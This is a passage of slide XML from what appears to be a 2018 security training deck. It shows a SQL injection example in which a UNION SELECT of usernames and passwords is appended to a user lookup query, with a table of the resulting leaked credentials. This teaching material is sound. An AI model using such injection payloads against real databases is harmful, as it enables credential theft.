                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Kevin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Babcock</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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1"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562"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563" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-314987" y="438975"/>
            <a:ext cx="24793841" cy="5852952"/>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566" name="SELECT first_name, last_name…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6257730" y="538113"/>
            <a:ext cx="9486281" cy="565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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> first_name, last_name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  u.id=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>UNION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> username, password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="8484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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="568" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1056078" y="6679517"/>
          <a:ext cx="22271843" cy="5758319"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="1" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11132125"/>
                <a:gridCol w="11139717"/>
              </a:tblGrid>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>first_name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>last_name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Rich</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Adams</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Arup</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Chakrabarti</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Kevin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Babcock</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>rich</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>arup</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>123456</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>kevin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>t3hl33thaxx0r</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062085" y="9963885"/>
            <a:ext cx="22259828" cy="2442201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FF320A"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pP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3"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574"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575" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
